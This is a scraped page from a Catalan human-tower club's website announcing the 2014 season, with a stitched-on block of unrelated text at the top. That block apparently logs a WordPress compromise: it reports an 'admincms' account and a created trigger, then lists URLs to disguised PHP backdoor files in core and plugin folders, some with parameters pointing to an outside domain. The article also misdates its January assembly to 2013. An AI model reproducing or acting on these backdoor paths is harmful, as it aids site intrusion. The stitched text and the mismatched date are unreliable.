Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?private https://castellersdeberga.cat/wp-admin/press-this-wp-stream-private-ajax-response-ajax-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/admin-filters-cron-ajax-response-stream-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-ftp-pure-meta-stream-stream-cron-stream-cron-ajax-cron.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-cron-ajax-stream-cron.php https://castellersdeberga.cat/wp-content/plugins/index-ajax-private-ajax-response-core-core-cron-ajax.php https://castellersdeberga.cat/wp-includes/Requests/Response-meta-core-cron-wp.php https://castellersdeberga.cat/wp-includes/customize/class-wp-widget-area-customize-control-private-private-ajax-response.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Comença la temporada 2014
 

Comença la temporada 2014


Comença la temporada 2014Els Castellers de Berga estan a punt de començar la seva tercera temporada. Diumenge 26 de gener de 2013, celebren l’Assemblea General Ordinària i, diumenge 2 de febrer, comencen els assajos al Teatre de Cal Rosal. Després d’un període sense actuar ni assajar, toca tornar a la feina. Durant les properes setmanes d’hivern, els assajos seran els divendres al vespre i els diumenges a la tarda. Més endavant, els assajos de diumenge passaran a dimarts. Tothom és convidat a participar-hi. A més a més, el diumenge 16 de març, al Pavelló d’Esports de Berga, hi ha programada l’Escola de Castells, una jornada on es convoquen tots els centres educatius de la comarca i tothom qui s’hi vulgui afegir per introduir-se al món dels castells.
La primera actuació dels Castellers de Berga serà a Gironella, el 23 de març, dins els actes de la Fira de Sant Josep. Els berguedans faran una vintena d’actuacions i tancaran la temporada l’1 de novembre a Súria.